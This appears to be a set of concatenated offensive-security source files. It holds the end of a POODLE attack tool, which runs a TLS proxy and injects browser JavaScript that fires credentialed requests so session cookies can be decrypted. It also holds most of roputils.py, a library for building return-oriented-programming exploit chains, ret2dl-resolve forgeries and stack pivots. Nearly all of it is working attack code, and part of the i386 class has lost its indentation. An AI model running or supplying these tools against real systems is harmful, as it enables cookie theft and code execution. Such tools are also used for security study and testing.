    """Run the HTTP request-generator server (blocks until interrupted).

    Shares the same `victims` dict as the TLS proxy so both sides see one
    attack state per client address.
    """
    print("Starting HTTP server on {}:{} generating requests to {}".format(args.listen_host, args.listen_port_http,
                                                                           args.targetURL))
    httpd = http.server.HTTPServer((args.listen_host, int(args.listen_port_http)), PoodleHTTPRequestHandler)
    httpd.victims = victims
    httpd.poodleManager = poodleManager
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        print("Shutdown of HTTP server on user request")
def print_debug(msg):
    """Print *msg* only when the --debug flag was given."""
    if not args.debug:
        return
    print(msg)
def hexdump(bin):
    """Format a byte sequence as lines of 16 space-separated hex bytes."""
    rows = []
    for offset in range(0, len(bin), 16):
        chunk = bin[offset:offset + 16]
        rows.append(" ".join("{:02x}".format(byte) for byte in chunk))
    return "\n".join(rows)
### Main ###
if __name__ == '__main__':
    # Command line: derive TLS forwarding target from the HTTPS target URL
    # unless explicitly overridden.
    argparser = argparse.ArgumentParser(description="The POODLE Attack")
    argparser.add_argument("targetURL",
                           help="Target URL. Requests are performed against this URL and TLS forwardings are derived from this.")
    argparser.add_argument("--listen-host", "-lh", default="", help="TLS/SSL and HTTP listening host")
    argparser.add_argument("--listen-port-tls", "-lpt", default="443", help="TLS/SSL listening port")
    argparser.add_argument("--listen-port-http", "-lph", default="80", help="HTTP listening port")
    argparser.add_argument("--target-host", "-th", default=None,
                           help="Target host override, normally derived from target URL")
    argparser.add_argument("--target-port", "-tp", default=None,
                           help="Target port override, normally derived from target URL")
    argparser.add_argument("--start-offset", "-so", default=384, help="Start decryption at this offset")
    argparser.add_argument("--debug", "-d", action="store_true", help="Debugging output")
    args = argparser.parse_args()

    targetURL = urlparse(args.targetURL)
    if targetURL.scheme != "https":
        print("Target must be HTTPS URL!");
        sys.exit(1)
    # Fill in host/port defaults from the parsed URL (443 if unspecified).
    args.target_host = args.target_host or targetURL.hostname
    args.target_port = int(args.target_port or 0) or int(targetURL.port or 443)

    # jsFile = open("POODLEClient.js", "r")
    # Inlined request-generator JavaScript: fires a padded POST to ###URL###,
    # then asks /nextRequest for the next padding lengths, in a loop.
    jsCode = """
    var urllen = 0;
    var postlen = 26;
    var delay = 10;

    function strPad(n) {
        if (n > 0) {
            return Array(n + 1).join("A");
        } else {
            return "";
        }
    }

    function performSSLRequest() {
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = sslRequestHandler;
        xhr.withCredentials = true;
        xhr.open("POST", "###URL###?" + strPad(urllen));
        xhr.send(strPad(postlen));
    }

    function sslRequestHandler() {
        if (this.readyState == this.DONE) {
            queryNextRequest();
        }
    }

    function queryNextRequest() {
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = queryNextRequestHandler;
        xhr.open("GET", "/nextRequest");
        xhr.send(null);
    }

    function queryNextRequestHandler() {
        if (this.readyState == this.DONE) {
            var res = this.responseText.split(":");
            urllen = Number(res[0]);
            postlen = Number(res[1]);
            setTimeout(performSSLRequest, delay);
        }
    }

    performSSLRequest();
    """
    # jsFile.close()

    # Shared state: `victims` maps client IP -> POODLEAttack, shared between
    # the TLS proxy process and the HTTP generator process.
    manager = Manager()
    poodleManager = POODLEManager()
    poodleManager.start()
    victims = manager.dict()

    poodleSSLTLSServer = Process(target=ssltlsServer, args=(victims, poodleManager))
    poodleSSLTLSServer.start()
    poodleHTTPServer = Process(target=httpServer, args=(victims, poodleManager))
    poodleHTTPServer.start()
    try:
        poodleSSLTLSServer.join()
        poodleHTTPServer.join()
    except KeyboardInterrupt:
        print("Bye!")
roputils.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys
import os
import re
import struct
import socket
import select
import random
import tempfile
from pwn import *
from subprocess import Popen, PIPE
from threading import Thread, Event
from telnetlib import Telnet
from contextlib import contextmanager
#context.log_level = 'debug'
def int16(x):
    """Parse a hexadecimal string as int; lists/tuples are parsed element-wise."""
    if not isinstance(x, (list, tuple)):
        return int(x, 16)
    return [int(item, 16) for item in x]
def p32(x):
    """Pack int(s) as little-endian 32-bit value(s); unpack if given raw data."""
    if isinstance(x, str):
        # raw data -> integer
        return struct.unpack('<I', x)[0]
    if isinstance(x, (list, tuple)):
        # sequence of integers -> concatenated packed words
        return struct.pack('<%dI' % len(x), *x)
    # single integer -> packed word
    return struct.pack('<I', x)
def p64(x):
    """Pack int(s) as little-endian 64-bit value(s); unpack if given raw data."""
    if isinstance(x, str):
        # raw data -> integer
        return struct.unpack('<Q', x)[0]
    if isinstance(x, (list, tuple)):
        # sequence of integers -> concatenated packed words
        return struct.pack('<%dQ' % len(x), *x)
    # single integer -> packed word
    return struct.pack('<Q', x)
class ELF(object):
    """Parse an ELF binary by scraping `readelf -W -a` output.

    Collects sections, program headers, the dynamic section, PLT/GOT
    relocations, the symbol table and embedded printable strings, and
    derives hardening flags (RELRO, BIND_NOW, stack canary, NX, PIE,
    RPATH/RUNPATH, DT_DEBUG) into ``self.sec``.

    NOTE: this is Python 2 code (print statements, iteritems) and relies on
    the exact text layout of readelf's C-locale output.
    """

    def __init__(self, fpath, base=0):
        # Run helpers with a C message locale so readelf output is parseable.
        def env_with(d):
            env = os.environ.copy()
            env.update(d)
            return env

        self.fpath = fpath
        #print 'fpath:'+fpath
        self.base = base  # load base added to every parsed address
        self.sec = dict(relro=False, bind_now=False, stack_canary=False, nx=False, pie=False, rpath=False, runpath=False, dt_debug=False)
        if not os.path.exists(fpath):
            raise Exception("file not found: %r" % fpath)

        self._entry_point = None
        self._section = {}    # name -> (address, size)
        self._dynamic = {}    # dynamic tag type -> value
        self._got = {}        # symbol -> GOT slot address
        self._plt = {}        # symbol -> PLT stub address
        self._symbol = {}     # symbol -> value
        self._load_blobs = [] # (virtaddr, raw bytes, is_executable) per LOAD segment
        self._string = {}     # virtaddr -> printable string found in a LOAD blob

        # One line-matching regex per readelf output table.
        regexp = {
            'section': r'^\s*\[(?P<Nr>[^\]]+)\]\s+(?P<Name>\S+)\s+(?P<Type>\S+)\s+(?P<Address>\S+)\s+(?P<Off>\S+)\s+(?P<Size>\S+)\s+(?P<ES>\S+)\s+(?P<Flg>\S+)\s+(?P<Lk>\S+)\s+(?P<Inf>\S+)\s+(?P<Al>\S+)$',
            'program': r'^\s*(?P<Type>\S+)\s+(?P<Offset>\S+)\s+(?P<VirtAddr>\S+)\s+(?P<PhysAddr>\S+)\s+(?P<FileSiz>\S+)\s+(?P<MemSiz>\S+)\s+(?P<Flg>.{3})\s+(?P<Align>\S+)$',
            'dynamic': r'^\s*(?P<Tag>\S+)\s+\((?P<Type>[^)]+)\)\s+(?P<Value>.+)$',
            'reloc': r'^\s*(?P<Offset>\S+)\s+(?P<Info>\S+)\s+(?P<Type>\S+)\s+(?P<Value>\S+)\s+(?P<Name>\S+)(?: \+ (?P<AddEnd>\S+))?$',
            'symbol': r'^\s*(?P<Num>[^:]+):\s+(?P<Value>\S+)\s+(?P<Size>\S+)\s+(?P<Type>\S+)\s+(?P<Bind>\S+)\s+(?P<Vis>\S+)\s+(?P<Ndx>\S+)\s+(?P<Name>\S+)',
            'string': r'([\s\x21-\x7e]{4,})\x00',
        }
        # arch -> (PLT header size, PLT entry size) used to compute stub addresses.
        plt_size_map = {
            'i386': (0x10, 0x10),
            'x86-64': (0x10, 0x10),
            'arm': (0x14, 0xc),
        }
        has_dynamic_section = True
        has_symbol_table = True
        p = Popen(['readelf', '-W', '-a', fpath], env=env_with({"LC_MESSAGES": "C"}), stdout=PIPE)

        # read ELF Header (up to the "Section Headers:" banner)
        while True:
            #print 'prpr'
            line = p.stdout.readline()
            #print 'ha'
            #print 'line:'+line
            if line == 'Section Headers:\n':
                break
            m = re.search(r'^\s*(?P<key>[^:]+):\s+(?P<value>.+)$', line)
            if not m:
                continue
            key, value = m.group('key', 'value')
            if key == 'Class':
                if value == 'ELF64':
                    self.wordsize = 8
                elif value == 'ELF32':
                    self.wordsize = 4
                else:
                    raise Exception("unsupported ELF Class: %r" % value)
            elif key == 'Type':
                # DYN implies PIE for executables parsed here.
                if value == 'DYN (Shared object file)':
                    self.sec['pie'] = True
                elif value == 'EXEC (Executable file)':
                    self.sec['pie'] = False
                else:
                    raise Exception("unsupported ELF Type: %r" % value)
            elif key == 'Machine':
                if value == 'Advanced Micro Devices X86-64':
                    self.arch = 'x86-64'
                elif value == 'Intel 80386':
                    self.arch = 'i386'
                elif value == 'ARM':
                    self.arch = 'arm'
                else:
                    raise Exception("unsupported ELF Machine: %r" % value)
            elif key == 'Entry point address':
                self._entry_point = int16(value)

        # read Section Headers
        while True:
            line = p.stdout.readline()
            if line == 'Program Headers:\n':
                break
            m = re.search(regexp['section'], line)
            if not m or m.group('Nr') == 'Nr':  # skip the column-title row
                continue
            name = m.group('Name')
            address, size = int16(m.group('Address', 'Size'))
            self._section[name] = (address, size)

        # read Program Headers; also slurp LOAD segment bytes for gadget/string search
        while True:
            line = p.stdout.readline()
            if line.startswith('Dynamic section'):
                has_dynamic_section = True
                break
            elif line == 'There is no dynamic section in this file.\n':
                has_dynamic_section = False
                break
            m = re.search(regexp['program'], line)
            if not m or m.group('Type') == 'Type':
                continue
            type_, flg = m.group('Type', 'Flg')
            offset, virtaddr, filesiz = int16(m.group('Offset', 'VirtAddr', 'FileSiz'))
            if type_ == 'GNU_RELRO':
                self.sec['relro'] = True
            elif type_ == 'GNU_STACK':
                # stack is non-executable unless the E flag is present
                if not 'E' in flg:
                    self.sec['nx'] = True
            elif type_ == 'LOAD':
                with open(fpath, 'rb') as f:
                    f.seek(offset)
                    blob = f.read(filesiz)
                is_executable = ('E' in flg)
                self._load_blobs.append((virtaddr, blob, is_executable))
                # index printable strings by virtual address
                for m in re.finditer(regexp['string'], blob):
                    self._string[virtaddr+m.start()] = m.group(1)

        # read Dynamic section
        while has_dynamic_section:
            line = p.stdout.readline()
            if line.startswith('Relocation section'):
                break
            m = re.search(regexp['dynamic'], line)
            if not m or m.group('Tag') == 'Tag':
                continue
            type_, value = m.group('Type', 'Value')
            if type_ == 'BIND_NOW':
                self.sec['bind_now'] = True
            elif type_ == 'RPATH':
                self.sec['rpath'] = True
            elif type_ == 'RUNPATH':
                self.sec['runpath'] = True
            elif type_ == 'DEBUG':
                self.sec['dt_debug'] = True
            if value.startswith('0x'):
                self._dynamic[type_] = int16(value)
            elif value.endswith(' (bytes)'):
                self._dynamic[type_] = int(value.split()[0])

        # read Relocation section (.rel.plt/.rela.plt): build GOT and PLT maps
        in_unwind_table_index = False
        plt_header_size, plt_entry_size = plt_size_map[self.arch]
        while True:
            line = p.stdout.readline()
            if line.startswith('Symbol table'):
                has_symbol_table = True
                break
            elif line == 'No version information found in this file.\n':
                has_symbol_table = False
                break
            elif in_unwind_table_index or line.startswith('Unwind table index'):
                # skip ARM unwind tables entirely
                in_unwind_table_index = True
                continue
            m = re.search(regexp['reloc'], line)
            if not m or m.group('Offset') == 'Offset':
                continue
            type_, name = m.group('Type', 'Name')
            offset, info = int16(m.group('Offset', 'Info'))
            if not type_.endswith('JUMP_SLOT'):
                continue
            name = name.split('@')[0]
            self._got[name] = offset
            # PLT stubs are laid out sequentially after the PLT header,
            # in relocation order.
            self._plt[name] = self._section['.plt'][0] + plt_header_size + plt_entry_size * len(self._plt)
            if name == '__stack_chk_fail':
                self.sec['stack_canary'] = True

        # read Symbol table (defined symbols only)
        while has_symbol_table:
            line = p.stdout.readline()
            if line.startswith('Version symbols section') or line == 'No version information found in this file.\n':
                break
            m = re.search(regexp['symbol'], line)
            if not m or m.group('Num') == 'Num':
                continue
            if m.group('Ndx') == 'UND':
                continue
            name, value = m.group('Name'), int16(m.group('Value'))
            self._symbol[name] = value
            # also register versioned symbols (foo@@GLIBC_x) under the bare name
            if '@@' in name:
                default_name = name.split('@@')[0]
                self._symbol[default_name] = value
        p.wait()

    def set_base(self, addr, ref_symbol=None):
        """Set load base; with ref_symbol, derive base from that symbol's
        runtime address."""
        self.base = addr
        if ref_symbol:
            self.base -= self._symbol[ref_symbol]

    def offset(self, offset):
        # Rebase a file-relative address.
        return self.base + offset

    def section(self, name):
        """Runtime address of section `name`."""
        return self.offset(self._section[name][0])

    def dynamic(self, name):
        """Runtime value of dynamic tag `name` (e.g. 'JMPREL', 'SYMTAB')."""
        return self.offset(self._dynamic[name])

    def got(self, name=None):
        """GOT slot of `name`, or the PLTGOT base when name is omitted."""
        if name:
            return self.offset(self._got[name])
        else:
            return self.dynamic('PLTGOT')

    def plt(self, name=None):
        """PLT stub of `name`, or the start of .plt when name is omitted."""
        if name:
            return self.offset(self._plt[name])
        else:
            return self.offset(self._section['.plt'][0])

    def addr(self, name):
        """Runtime address of symbol `name`."""
        return self.offset(self._symbol[name])

    def str(self, name):
        """Address of the NUL-terminated string `name` inside the binary."""
        return self.search(name + '\x00')

    def search(self, s, xonly=False):
        """Find the first occurrence of bytes/regex `s` in the LOAD blobs.

        With xonly=True only executable segments are searched (gadget
        search); on ARM, odd (Thumb-flagged) addresses are skipped.
        Integers are packed to the native word size first.
        Raises ValueError when nothing matches.
        """
        if isinstance(s, int):
            s = self.p(s)
        for virtaddr, blob, is_executable in self._load_blobs:
            if xonly and not is_executable:
                continue
            if isinstance(s, re._pattern_type):  # NOTE: py2-only attribute
                for m in re.finditer(s, blob):
                    addr = self.offset(virtaddr + m.start())
                    if self.arch == 'arm' and xonly and addr % 2 != 0:
                        continue
                    return addr
            else:
                i = -1
                while True:
                    i = blob.find(s, i+1)
                    if i == -1:
                        break
                    addr = self.offset(virtaddr + i)
                    if self.arch == 'arm' and xonly and addr % 2 != 0:
                        continue
                    return addr
        else:
            # for-else: no LOAD blob contained a match
            raise ValueError()

    def checksec(self):
        """Print a checksec-style colored summary of hardening flags."""
        result = ''
        if self.sec['relro']:
            result += '\033[32mFull RELRO   \033[m ' if self.sec['bind_now'] else '\033[33mPartial RELRO\033[m '
        else:
            result += '\033[31mNo RELRO     \033[m '
        result += '\033[32mCanary found   \033[m ' if self.sec['stack_canary'] else '\033[31mNo canary found\033[m '
        result += '\033[32mNX enabled \033[m ' if self.sec['nx'] else '\033[31mNX disabled\033[m '
        result += '\033[32mPIE enabled  \033[m ' if self.sec['pie'] else '\033[31mNo PIE       \033[m '
        result += '\033[31mRPATH    \033[m ' if self.sec['rpath'] else '\033[32mNo RPATH \033[m '
        result += '\033[31mRUNPATH    \033[m ' if self.sec['runpath'] else '\033[32mNo RUNPATH \033[m '
        result += self.fpath
        print 'RELRO           STACK CANARY      NX           PIE             RPATH      RUNPATH      FILE'
        print "%s\n" % result
        # __*_chk PLT entries indicate FORTIFY_SOURCE was used at build time.
        fortified_funcs = [name for name in self._plt if re.search(r'^__\w+_chk$', name)]
        if fortified_funcs:
            print "FORTIFY_SOURCE: \033[32mFortified\033[m (%s)" % ', '.join(fortified_funcs)
        else:
            print 'FORTIFY_SOURCE: \033[31mNo\033[m'

    def objdump(self):
        """Disassemble via objdump and print an annotated listing.

        Adds IDA-style labels (sub_/loc_), CODE/DATA XREF comments, entry
        point marker, and inline annotations for .data/.bss references,
        symbols and string literals.
        """
        p = Popen(Asm.cmd[self.arch]['objdump'] + [self.fpath], stdout=PIPE)
        stdout, stderr = p.communicate()
        rev_symbol = {}  # address -> symbol names
        rev_plt = {}     # address -> PLT stub names
        for k, v in self._symbol.iteritems():
            rev_symbol.setdefault(v, []).append(k)
        for k, v in self._plt.iteritems():
            rev_plt.setdefault(v, []).append(k)
        lines = []
        labels = {}      # address -> label text (or None)
        code_xrefs = {}  # target address -> set of referencing addresses
        data_xrefs = {}
        # pass 1: collect addresses
        for line in stdout.splitlines():
            ary = line.strip().split(':', 1)
            try:
                addr, expr = int16(ary[0]), ary[1]
                labels[addr] = None
            except ValueError:
                addr, expr = None, None
            lines.append((line, addr, expr))
        # pass 2: collect call/jump/data references
        for line, addr, expr in lines:
            if addr is None:
                continue
            if addr == self._entry_point:
                labels[addr] = '_start'
            m = re.search(r'call\s+(?:0x)?([\dA-Fa-f]+)\b', line)
            if m:
                ref = int16(m.group(1))
                labels[ref] = "sub_%x" % ref
                code_xrefs.setdefault(ref, set()).add(addr)
            m = re.search(r'j\w{1,2}\s+(?:0x)?([\dA-Fa-f]+)\b', line)
            if m:
                ref = int16(m.group(1))
                labels[ref] = "loc_%x" % ref
                code_xrefs.setdefault(ref, set()).add(addr)
            for m in re.finditer(r',0x([\dA-Fa-f]{3,})\b', expr):
                ref = int16(m.group(1))
                if ref in labels:
                    labels[ref] = "loc_%x" % ref
                    data_xrefs.setdefault(ref, set()).add(addr)
        for k, v in code_xrefs.iteritems():
            code_xrefs[k] = sorted(list(v))
        for k, v in data_xrefs.iteritems():
            data_xrefs[k] = sorted(list(v))
        # pass 3: output with annotations
        def repl_func1(addr):
            # colorize call/jump targets and show relative offset
            def _f(m):
                op = m.group(1)
                ref = int16(m.group(2))
                if op.startswith('call'):
                    color = 33
                else:
                    color = 32 if ref > addr else 35  # forward vs backward jump
                return "\x1b[%dm%s%s [%+#x]\x1b[0m" % (color, m.group(1), labels[ref], ref-addr)
            return _f
        def repl_func2(color):
            # replace immediate data operands with their label when known
            def _f(m):
                addr = int16(m.group(1))
                if addr in labels and not addr in rev_symbol:
                    return ",\x1b[%dm%s\x1b[0m" % (color, labels[addr])
                else:
                    return m.group(0)
            return _f
        # up-/down-arrow glyphs for xref direction
        arrows = {}
        for k, v in [(True, u'\u25b2'), (False, u'\u25bc')]:
            arrows[k] = v.encode('utf-8')
        for line, addr, expr in lines:
            if addr is None:
                print line
                continue
            line = re.sub(r'(call\s+)[\dA-Fa-f]{3,}\s+<([\w@\.]+)>', '\x1b[33m\\1\\2\x1b[0m', line)
            line = re.sub(r'(call\s+)(?:0x)?([\dA-Fa-f]{3,})\b.*', repl_func1(addr), line)
            line = re.sub(r'(j\w{1,2}\s+)[\dA-Fa-f]{3,}\s+<([\w@\.]+)>', '\x1b[32m\\1\\2\x1b[0m', line)
            line = re.sub(r'(j\w{1,2}\s+)(?:0x)?([\dA-Fa-f]{3,})\b.*', repl_func1(addr), line)
            line = re.sub(r',0x([\dA-Fa-f]{3,})\b', repl_func2(36), line)
            expr = line.split(':', 1)[1]
            label = ''
            if labels[addr]:
                if not addr in rev_symbol and not addr in rev_plt:
                    if labels[addr].startswith('loc_'):
                        label += "\x1b[38;1m%s:\x1b[0m" % labels[addr]
                        label = label.ljust(78+11)
                    else:
                        label += "\x1b[33m%s:\x1b[0m" % labels[addr]
                        label = label.ljust(78+9)
                else:
                    label = label.ljust(78)
                if addr in code_xrefs:
                    ary = ["%x%s" % (x, arrows[x < addr]) for x in code_xrefs[addr]]
                    label += " \x1b[30;1m; CODE XREF: %s\x1b[0m" % ', '.join(ary)
                if addr in data_xrefs:
                    ary = ["%x%s" % (x, arrows[x < addr]) for x in data_xrefs[addr]]
                    label += " \x1b[30;1m; DATA XREF: %s\x1b[0m" % ', '.join(ary)
                if addr == self._entry_point:
                    label += ' \x1b[30;1m; ENTRY POINT\x1b[0m'
                if label:
                    print label
            annotations = []
            for m in re.finditer(r'([\dA-Fa-f]{3,})\b', expr):
                ref = int16(m.group(1))
                if 0 <= ref - self._section['.data'][0] < self._section['.data'][1]:
                    annotations.append('[.data]')
                elif 0 <= ref - self._section['.bss'][0] < self._section['.bss'][1]:
                    annotations.append('[.bss]')
                if ref in rev_symbol:
                    annotations.append(', '.join(rev_symbol[ref]))
                if ref in self._string:
                    annotations.append(repr(self._string[ref]))
            if annotations:
                print "%-70s \x1b[30;1m; %s\x1b[0m" % (line, ' '.join(annotations))
            else:
                print line
            # visual separator after control-flow terminators
            if re.search(r'\t(?:ret|jmp)', line):
                print "\x1b[30;1m; %s\x1b[0m" % ('-' * 78)
class ROP(ELF):
    """ELF subclass adding ROP-chain building blocks.

    On construction it rebinds ``self.__class__`` to an architecture-specific
    subclass (ROP_I386 / ROP_X86_64 / ROP_ARM) so gadget lookups dispatch to
    the right instruction encodings.
    """

    def __init__(self, *args, **kwargs):
        ELF.__init__(self, *args, **kwargs)
        # Specialize the instance in place based on the parsed architecture.
        if self.arch == 'i386':
            self.__class__ = type('ROP_I386', (ROP_I386,), {})
        elif self.arch == 'x86-64':
            self.__class__ = type('ROP_X86_64', (ROP_X86_64,), {})
        elif self.arch == 'arm':
            self.__class__ = type('ROP_ARM', (ROP_ARM,), {})
        else:
            raise Exception("unknown architecture: %r" % self.arch)

    def p(self, x):
        """Pack to the binary's native word size (p64 for ELF64, else p32)."""
        if self.wordsize == 8:
            return p64(x)
        else:
            return p32(x)

    def gadget(self, s):
        """Find raw byte sequence `s` in an executable segment."""
        return self.search(s, xonly=True)

    def string(self, s):
        """NUL-terminate `s` for embedding in a payload."""
        return s + '\x00'

    def junk(self, n=1):
        """`n` words of filler."""
        return self.fill(self.wordsize * n)

    def fill(self, size, buf=''):
        """Random alphanumeric padding up to `size`, accounting for `buf`."""
        chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
        buflen = size - len(buf)
        assert buflen >= 0, "%d bytes over" % (-buflen,)
        return ''.join(random.choice(chars) for i in xrange(buflen))

    def align(self, addr, origin, size):
        """Round `addr` up to the next `size`-aligned boundary relative to
        `origin`; returns (aligned_addr, pad_length)."""
        padlen = size - ((addr-origin) % size)
        return (addr+padlen, padlen)

    def load(self, blob, base=0):
        """Register extra executable bytes (e.g. a dumped library) for
        gadget search."""
        self._load_blobs += [(base, blob, True)]

    def scan_gadgets(self, regexp):
        """Disassemble and print every match of `regexp` in executable
        segments until a flow terminator or invalid instruction."""
        for virtaddr, blob, is_executable in self._load_blobs:
            if not is_executable:
                continue
            for m in re.finditer(regexp, blob):
                if self.arch == 'arm':
                    # gadgets on ARM are searched in Thumb mode
                    arch = 'thumb'
                else:
                    arch = self.arch
                p = Popen(Asm.cmd[arch]['objdump_binary'] + ["--adjust-vma=%d" % virtaddr, "--start-address=%d" % (virtaddr+m.start()), self.fpath], stdout=PIPE)
                stdout, stderr = p.communicate()
                lines = stdout.splitlines()[7:]
                if '\t(bad)' in lines[0]:
                    continue
                for line in lines:
                    print line
                    if re.search(r'\t(?:ret|jmp|\(bad\)|; <UNDEFINED> instruction|\.\.\.)', line):
                        print '-' * 80
                        break

    def list_gadgets(self):
        # Overridden by architecture-specific subclasses.
        raise NotImplementedError("not implemented for this architecture: %r" % self.arch)
class ROP_I386(ROP):
regs = ['eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi']
def gadget(self, keyword, reg=None, n=1):
def regexp_or(*args):
return re.compile('(?:' + '|'.join(map(re.escape, args)) + ')')
table = {
'pushad': '\x60\xc3',
'popad': '\x61\xc3',
'leave': '\xc9\xc3',
'ret': '\xc3',
'int3': '\xcc',
'int80': '\xcd\x80',
'call_gs10': '\x65\xff\x15\x10\x00\x00\x00',
'syscall': '\x0f\x05',
}
if keyword in table:
return self.search(table[keyword], xonly=True)
if reg:
try:
r = self.regs.index(reg)
except ValueError:
raise Exception("unexpected register: %r" % reg)
else:
r = self.regs.index('esp')
if keyword == 'pop':
if reg:
chunk1 = chr(0x58+r) + '\xc3'
chunk2 = '\x8f' + chr(0xc0+r) + '\xc3'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
else:
# skip esp
return self.search(re.compile(r"(?:[\x58-\x5b\x5d-\x5f]|\x8f[\xc0-\xc3\xc5-\xc7]){%d}\xc3" % n), xonly=True)
elif keyword == 'call':
chunk = '\xff' + chr(0xd0+r)
return self.search(chunk, xonly=True)
elif keyword == 'jmp':
chunk = '\xff' + chr(0xe0+r)
return self.search(chunk, xonly=True)
elif keyword == 'jmp_ptr':
chunk = '\xff' + chr(0x20+r)
return self.search(chunk, xonly=True)
elif keyword == 'push':
chunk1 = chr(0x50+r) + '\xc3'
chunk2 = '\xff' + chr(0xf0+r) + '\xc3'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
elif keyword == 'pivot':
# chunk1: xchg REG, esp
# chunk2: xchg esp, REG
if r == 0:
chunk1 = '\x94\xc3'
else:
chunk1 = '\x87' + chr(0xe0+r) + '\xc3'
chunk2 = '\x87' + chr(0xc4+8*r) + '\xc3'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
elif keyword == 'loop':
chunk1 = '\xeb\xfe'
chunk2 = '\xe9\xfb\xff\xff\xff'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
else:
# search directly
return ROP.gadget(self, keyword)
def call(self, addr, *args):
if isinstance(addr, str):
addr = self.plt(addr)
buf = self.p(addr)
buf += self.p(self.gadget('pop', n=len(args)))
buf += self.p(args)
return buf
def call_chain_ptr(self, *calls, **kwargs):
raise Exception('support x86-64 only')
def dl_resolve_data(self, base, name):
jmprel = self.dynamic('JMPREL')
relent = self.dynamic('RELENT')
symtab = self.dynamic('SYMTAB')
syment = self.dynamic('SYMENT')
strtab = self.dynamic('STRTAB')
addr_reloc, padlen_reloc = self.align(base, jmprel, relent)
addr_sym, padlen_sym = self.align(addr_reloc+relent, symtab, syment)
addr_symstr = addr_sym + syment
r_info = (((addr_sym - symtab) / syment) << 8) | 0x7
st_name = addr_symstr - strtab
buf = self.fill(padlen_reloc)
buf += struct.pack('<II', base, r_info) # Elf32_Rel
buf += self.fill(padlen_sym)
buf += struct.pack('<IIII', st_name, 0, 0, 0x12) # Elf32_Sym
buf += self.string(name)
return buf
def dl_resolve_call(self, base, *args):
    """i386 chain fragment that enters PLT0 with a forged relocation
    offset pointing at the data produced by dl_resolve_data(base, ...)."""
    jmprel = self.dynamic('JMPREL')
    relent = self.dynamic('RELENT')
    addr_reloc, padlen_reloc = self.align(base, jmprel, relent)
    # On i386 the PLT pushes a *byte* offset into JMPREL (unlike x86-64,
    # which uses an entry index).
    reloc_offset = addr_reloc - jmprel
    buf = self.p(self.plt())
    buf += self.p(reloc_offset)
    # Pop the stack arguments off after the resolved function returns.
    buf += self.p(self.gadget('pop', n=len(args)))
    buf += self.p(args)
    return buf
def syscall(self, number, *args):
    """i386 chain fragment invoking `int 0x80` syscall `number` with `args`.

    Prefers individual pop-reg gadgets; if one of them is missing
    (ValueError from gadget()), falls back to a single popad that loads
    every register at once.
    """
    try:
        arg_regs = ['ebx', 'ecx', 'edx', 'esi', 'edi', 'ebp']
        buf = self.p([self.gadget('pop', 'eax'), number])
        for arg_reg, arg in zip(arg_regs, args):
            buf += self.p([self.gadget('pop', arg_reg), arg])
    except ValueError:
        # popad = pop edi, esi, ebp, esp, ebx, edx, ecx, eax
        # so the stacked values below are ordered to land each arg in the
        # right register (esp slot is a dummy 0).
        args = list(args) + [0] * (6-len(args))
        buf = self.p([self.gadget('popad'), args[4], args[3], args[5], 0, args[0], args[2], args[1], number])
    buf += self.p(self.gadget('int80'))
    return buf
def pivot(self, rsp):
    """Stack-pivot to `rsp` using `pop ebp; ret` followed by `leave; ret`."""
    pop_ebp = self.gadget('pop', 'ebp')
    chain = self.p([pop_ebp, rsp - self.wordsize])
    chain += self.p(self.gadget('leave'))
    return chain
def retfill(self, size, buf=''):
    """Return padding covering `size - len(buf)` bytes built from
    ret-gadget addresses (a ret sled), word-aligned with filler bytes."""
    remaining = size - len(buf)
    assert remaining >= 0, "%d bytes over" % (-remaining,)
    sled = self.fill(remaining % self.wordsize)
    sled += self.p(self.gadget('ret')) * (remaining // self.wordsize)
    return sled
def list_gadgets(self):
    """Print an availability matrix of tiny gadgets for this binary.

    Green = gadget found, red = missing (ANSI colors).  Python 2 print
    statements; trailing commas suppress newlines.
    """
    print "%8s" % 'pop',
    for i in range(6):
        try:
            self.gadget('pop', n=i+1)
            print "\033[32m%d\033[m" % (i+1),
        except ValueError:
            print "\033[31m%d\033[m" % (i+1),
    print
    for keyword in ['pop', 'jmp', 'jmp_ptr', 'call', 'push', 'pivot']:
        print "%8s" % keyword,
        for reg in self.regs:
            try:
                self.gadget(keyword, reg)
                print "\033[32m%s\033[m" % reg,
            except ValueError:
                print "\033[31m%s\033[m" % reg,
        print
    print "%8s" % 'etc',
    for keyword in ['pushad', 'popad', 'leave', 'ret', 'int3', 'int80', 'call_gs10', 'syscall', 'loop']:
        try:
            self.gadget(keyword)
            print "\033[32m%s\033[m" % keyword,
        except ValueError:
            print "\033[31m%s\033[m" % keyword,
    print
class ROP_X86_64(ROP):
    """ROP-chain builder for x86-64 ELF binaries."""
    # Order matches the hardware encoding numbers (rax=0 ... rdi=7);
    # r8-r15 require a REX.B (0x41 / 0x49 / 0x4c) prefix with r-8.
    regs = ['rax', 'rcx', 'rdx', 'rbx', 'rsp', 'rbp', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15']
    def gadget(self, keyword, reg=None, n=1):
        """Search the executable segment for a tiny gadget.

        keyword selects the family ('pop', 'call', 'jmp', ...), reg names
        the operand register where applicable, and n is the pop count for
        an anonymous 'pop' gadget.  Raises ValueError when not found
        (via search()).
        """
        def regexp_or(*args):
            # Alternation of literal byte chunks as a compiled regex.
            return re.compile('(?:' + '|'.join(map(re.escape, args)) + ')')
        # Fixed byte sequences needing no register operand.
        table = {
            'leave': '\xc9\xc3',
            'ret': '\xc3',
            'int3': '\xcc',
            'int80': '\xcd\x80',
            'call_gs10': '\x65\xff\x15\x10\x00\x00\x00',
            'syscall': '\x0f\x05',
        }
        if keyword in table:
            return self.search(table[keyword], xonly=True)
        if reg:
            try:
                r = self.regs.index(reg)
                need_prefix = bool(r >= 8)
                if need_prefix:
                    r -= 8
            except ValueError:
                raise Exception("unexpected register: %r" % reg)
        else:
            r = self.regs.index('rsp')
            need_prefix = False
        if keyword == 'pop':
            if reg:
                prefix = '\x41' if need_prefix else ''
                # pop REG; ret  (short and modrm encodings)
                chunk1 = prefix + chr(0x58+r) + '\xc3'
